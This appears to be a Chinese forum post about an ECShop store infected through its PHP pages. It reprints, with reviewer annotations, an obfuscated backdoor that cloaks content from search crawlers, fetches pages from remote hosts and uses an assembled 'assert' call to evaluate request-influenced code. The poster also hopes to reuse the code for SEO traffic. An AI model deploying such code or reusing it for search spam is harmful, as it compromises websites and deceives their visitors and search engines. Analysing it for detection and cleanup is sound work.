2013.6.3发布的补丁刚打上,就被挂马了,详情帖内

2016-07-07 15:12 来源:www.chinab4c.com 作者:ecshop专家

在商城根目录的article.php、goods.php页面顶部都被人加入了以下代码:
  1. <?php
     // NOTE(review): hostile sample, kept for analysis and detection only.
     // The forum renderer added the "N." list prefixes and wrapped lines mid-token, and
     // at least one identifier ($NMNEW**OJFOJNS) looks mangled, so the listing does not
     // parse as shown. The post says this block was found at the top of article.php and
     // goods.php in the shop's web root.
     //
     // Statements 2-28, in order:
     //  - Error display is switched off and the execution time limit removed. SID is
     //    defined as '33824', ROOT as the infected file's directory, LOCAL as true.
     //  - heade_(): true when $_GET['id'] contains SID (case-insensitive).
     //  - isspider($open): true for an SID-tagged request (skipped when $open is set), or
     //    when the User-Agent contains googlebot / baiduspider / sogou / yahoo / soso.
     //  - isindex(): true only when the script name contains /index., /default. or /main.,
     //    the query string is empty and the request is not SID-tagged.
     //  - Happy(): takes the client IP from REMOTE_ADDR, but prefers an IPv4-shaped
     //    Client-IP header, else the first X-Forwarded-For address that does not match its
     //    private-range pattern. Returns false when that IP contains one of the
     //    $TNT_Group prefixes, true otherwise. Presumably these are ranges the author
     //    wanted to exclude; the listing does not say whose they are.
     //  - With LOCAL set, a directory named HtmlSave is created next to the infected file.
     //  - If SID still equals the placeholder '_NOT_OPTION_X5', the file rewrites itself
     //    with a random ID (20000-99999) and then restores its earlier mtime via touch().
     //    SID is already '33824' here, so that branch would not run in this copy.
     //
     // Detection pointers visible in this listing: an unexpected HtmlSave directory in the
     // web root, host names split into tiny string fragments, oddly-cased base64_decode
     // calls, and a function called through a variable. Because of the touch() call, file
     // modification time is a weak signal; compare file contents against a clean release.
  2. ini_set('display_errors','Off');ini_set('max_execution_time', 0);define

  3. ('SID', '33824');define('ROOT', dirname(__FILE__));define('LOCAL',

  4. True);function heade_(){if (stristr($_GET['id'], SID)) return true; else return false;}


  5. function isspider($open = 0){if (!$open) if (heade_()) return

  6. true;$agent="agent:".strtolower($_SERVER

  7. ["HTTP_USER_AGENT"]);$searray=array

  8. ("googlebot","baiduspider","sogou","yahoo","soso");foreach($searray as $se){ if

  9. (strpos($agent,$se)>0) return true;}return false;}function isindex(){if (heade_())

  10. return false;$pname=strtolower($_SERVER

  11. ["SCRIPT_NAME"]);$pquery=strtolower($_SERVER

  12. ["QUERY_STRING"]);$parray=array("/index.","/default.","/main.");foreach($parray

  13. as $se){ if (strpos($pname,$se)>-1&&strlen($pquery)<1) return true;}}function

  14. Happy(){$ip = $_SERVER['REMOTE_ADDR'];if (isset($_SERVER

  15. ['HTTP_CLIENT_IP']) && preg_match('/^([0-9]{1,3}\.){3}[0-9]{1,3}$/', $_SERVER

  16. ['HTTP_CLIENT_IP'])) {$ip = $_SERVER['HTTP_CLIENT_IP'];} elseif(isset

  17. ($_SERVER['HTTP_X_FORWARDED_FOR']) AND preg_match_all('#\d{1,3}\.\d

  18. {1,3}\.\d{1,3}\.\d{1,3}#s', $_SERVER['HTTP_X_FORWARDED_FOR'],

  19. $matches)) {foreach ($matches[0] AS $xip) {if (!preg_match('#^(10|172\.16|192

  20. \.168)\.#', $xip)) {$ip = $xip;break;}}}$TNT_Group = array('123.125.68',

  21. '220.181.68', '220.181.7', '121.14.89','203.208.60', '210.72.225', '125.90.88',

  22. '220.181.108','123.125.71','123.125.67');foreach($TNT_Group as $addr) if

  23. (stristr($ip, $addr)) return False;return True;}if (LOCAL){$HtmlDir =

  24. ROOT.'/'.'HtmlSave';if (!is_dir($HtmlDir)) mkdir($HtmlDir);}if (SID ==

  25. '_N'.'OT_O'.'PTI'.'ON_X5'){if (function_exists('file_get_contents')){$ftime =

  26. filemtime(__FILE__);$N_ID = mt_rand(20000, 99999);$c_f = file_get_contents

  27. (__FILE__);$c_f = str_replace('_NOT_'.'OPTION_X5', $N_ID, $c_f);fwrite(fopen

  28. (__FILE__, 'w'), $c_f);touch(__FILE__, $ftime);}}
     // Any request carrying action=ad is answered with the body of a remote page fetched
     // by the server (errors silenced with @). The URL is split into fragments, which
     // defeats a plain-text search for the host; joined, the fragments read
     // hxxp://img[.]klgw01[.]com/p.html.
  29. if ($_GET['action'] == 'ad') die

  30. (@file_get_contents('htt'.'p:/'.'/i'.'mg.klg'.'w01.'.'com'.'/p'.'.ht'.'ml'));
     // Visitor branch. It fires only when Happy() is true, the User-Agent is not a listed
     // crawler, the Referer contains a listed search-engine name and the request is
     // SID-tagged. It then echoes remote content and exits; the fragments join to
     // hxxp://img[.]klgw01[.]com/c.txt. What that content does is not visible here.
  31. if (Happy())


  32. {$urlrefer=strtolower("refer:".@$_SERVER["HTTP_REFERER"]);$searray=array

  33. ("google","baidu","sogou","yahoo","soso","360");if (!isspider(1))foreach($searray

  34. as $se){if (strpos($urlrefer,$se)>0){if (heade_()){echo @file_get_contents

  35. ('ht'.'t'.'p://i'.'m'.'g.k'.'l'.'g'.'w'.'0'.'1.c'.'o'.'m/c'.'.t'.'xt');exit;}}}}

     // Crawler branch, taken when isspider() is true and isindex() is not (the operator is
     // a bitwise &). $ID is the id parameter with SID removed. If HtmlSave already holds a
     // file for that id (dots stripped from the name) it is served and the script ends, so
     // crawlers receive pages that the shop's real article.php / goods.php never produce.
  36. if (isspider() & !isindex

  37. ())
  38. {if (isset($N_ID)) $SID = $N_ID;if (SID != '_N'.'OT_O'.'PTI'.'ON_X5') $SID =

  39. SID;$ID = trim(str_replace(SID, '', $_GET['id']));$NMNEW**OJFOJNS = '';if

  40. (LOCAL){if (is_file($HtmlDir.'/'.str_replace('.', '', $ID))){ header('Content-Type:

  41. text/html; charset=UTF-8');die(file_get_contents($HtmlDir.'/'.str_replace('.', '',

  42. $ID)));}}
     // Query string for the remote content source: the Host header of the infected site,
     // the SID and, when id is present, a random "words" value plus the id remainder.
  43. $FF0ffff__ff_ff_ff1110 = 'domain='.$_SERVER['HTTP_HOST'];

  44. $FF0ffff__ff_ff_ff1110 .= $NMNEW**OJFOJNS = '&SID='.$SID;
  45. if (isset

  46. ($_GET['id'])) $_q = '?words='.mt_rand(1, 10).'&v='.$ID.'&'.$FF0ffff__ff_ff_ff1110;

  47. else $_q = '?'.$FF0ffff__ff_ff_ff1110;
     // Nested, oddly-cased base64_decode over split literals: the inner call yields '=='
     // and the outer one 'just'. Both variables appear below only as filler entries in the
     // str_replace search lists. $_FFFF11 and $_fFf1f are not used again in this listing.
  48. $_0101010101 = $_000000003F =

  49. BAsE64_DECODE('a'.'n'.'V'.'z'.'d'.'A'.BASE64_DECODE('P'.'T0'.'=')); $_FFFF11

  50. = $_fFf1f = '';
     // Helper declared inside the if-block; with its defaults it replaces '7' with '3'.
  51. function _00F0f00of00o0F0o0f0Fo($_FFFFFF, $_I1 = '3', $_II =

  52. '7') {return str_replace($_II,$_I1,$_FFFFFF);}
     // Statements 53-59 and 63-68 each strip a list of characters from a decoy English
     // sentence so that one letter is left. This assumes the line-wrapped quoted entries
     // were single spaces in the original file. $_000000 is never assigned in this
     // listing, so it presumably acts as an empty replacement. Some lists also include
     // $_GET[id] / $_GET[s] (unquoted keys). The letters are joined in statement 72.
  53. $__0xFFFF00FFF0F =

  54. str_replace(array('r','d','l','e','y','v','z','s','s','2','

  55. ',$_0101010101,$_000000003F,'0','.','g'), $_000000, 'say very g00d.');


  56. $__0xFFF101= str_replace(array('E','r','s','Z','i','J','z','s','v','S','

  57. ',$_0101010101,$_GET[id],$_000000003F,',','.','e'), '', ' Js Ss Ev Zs it SS.');


  58. $__0111111FFF = str_replace(array('u','i','d','o','y','n','e','W','a','2',' ',$_GET

  59. [s],$_0101010101,$_000000003F,',','.','#'), '', ' We and you is.');
     // Base64 literal with its padding split off. It contains neither '3' nor '7', so the
     // swap here and the helper call in statement 69 leave it unchanged. Statement 71
     // base64-decodes and reverses it; the result reads
     // hxxp://d[.]dongtai666[.]com/x5/x5.php.
  60. $ffofo_of00offff

  61. = str_replace('3', '7',

  62. 'cGhwLjV4LzV4L21vYy42NjZpYXRnbm9kLmQvLzpwdHRo'.''.'='.''.'=');


  63. $__0xFFF010101= str_replace(array('a','r','s','Z','y','J','z','s','v','S','

  64. ',$_0101010101,$_GET[id],$_000000003F,',','.'), '', ' Js s Jv Zs are SS.');


  65. $__0x111F01101100 = str_replace(array('W','e','t','o','y','m','e','h','o','u','

  66. ','i',$_0101010101,$_000000003F,',','.','#'), $_000000, ' We the mis you.');


  67. $__01111111FFF = str_replace(array('u','i','d','o','y','n','z','W','a','e',' ',$_GET

  68. [s],$_0101010101,$_000000003F,',','.','#'), '', ' We and you are.');


  69. $ffoff0o_of00000offff = _00F0f00of00o0F0o0f0Fo($ffofo_of00offff);


     // Builds PHP source text, as a string, that assigns file_get_contents(decoded URL
     // plus $_q) to $_conn. The function name is itself pieced together from fragments
     // and chr() calls. $_q carries data taken from the request, so request input ends up
     // inside text that the next statements evaluate; treat an infected host as fully
     // compromised, not merely spammed.
  70. $_o0o001100o111o011 ='$_conn = f'.'il'.'e_g'.'et_'.chr(99).'o'.chr(110).'ten'.'ts

  71. ("'.urldecode(strrev(bAse64_decode($ffoff0o_of00000offff.'='.''.'='))).$_q.'")';


     // $_E is the reverse of the six one-letter fragments; read as t, r, e, s, s, a they
     // spell "assert". Statement 75 calls that name as a variable function on the string
     // built above. assert() evaluated string arguments as code before PHP 8, which is
     // how $_conn receives the remote response. The "$_" / "_0x111F01101100" split across
     // statements 73-74 is a line-wrap artefact inside a single variable name.
  72. $_E=strrev

  73. ($__0xFFF101.''.''.$__01111111FFF.$__0xFFF010101.$__0111111FFF.''.''.$_

  74. _0x111F01101100.''.''.$__0xFFFF00FFF0F);
  75. ($_=$_E).$_

  76. ($_o0o001100o111o011);$_jHHsHHs = $H0F0o00po = $_conn;
     // Exits when fewer than 500 bytes came back. Otherwise the response is written to
     // HtmlSave under the dot-stripped id (only if no such file exists yet), sent as a
     // UTF-8 HTML page, and the script ends. The trailing "#..." text is an opaque tag
     // whose meaning cannot be determined from this listing.
  77. if (500 >

  78. strlen($_jHHsHHs)) Exit;if (LOCAL) if (!file_exists($HtmlDir.'/'.str_replace('.', '',

  79. $ID))) fwrite(fopen($HtmlDir.'/'.str_replace('.', '', $ID), 'w'), $_jHHsHHs);header

  80. ('Content-Type: text/html; charset=UTF-8');echo

  81. $_jHHsHHs;exit;#w7vT0MLywvQgvs3Du9PQybG6pg
  82. }


  83. ?>
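上面的代码定义了很多参数,并包含蜘蛛识别、IP判断和外部内容读取等逻辑,看样子像是做SEO的人黑的,请大家注意了!!我是用了2013.6.3发布的V2.7.3版本的UTF8补丁后,在凌晨2点出现这个现象的,现在已经把上面的代码删除,网站恢复正常。(注:仅删除这段代码并不能堵住被写入文件的入口;这段代码还会在被感染文件的同级目录下创建 HtmlSave 目录并缓存页面,应一并检查清理,并核对其他文件是否也被改动。)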

特别需要提醒的是,上述代码可能特别适合蜘蛛的胃口,像这种重复性的文章,百度竟然能在数小时内收录,说明这段代码产生的结果还是给力的。好多年不研究代码了,希望能有高人研究一下,公布给大家,让小店长们的铺子都收录起来,流量哗哗起来。

回答:
用备份的文件覆盖

用备份的文件覆盖

不知道楼主有没有听过 泛站群,一个VPS,一个域名,能生成N个页面,好的泛站群软件,十分钟内就可以被百度收录。。的确很厉害

请问打了官方的:[20130621]这个版本补丁,可后台还提示要打:[20130603]的版本,这个还要打吗?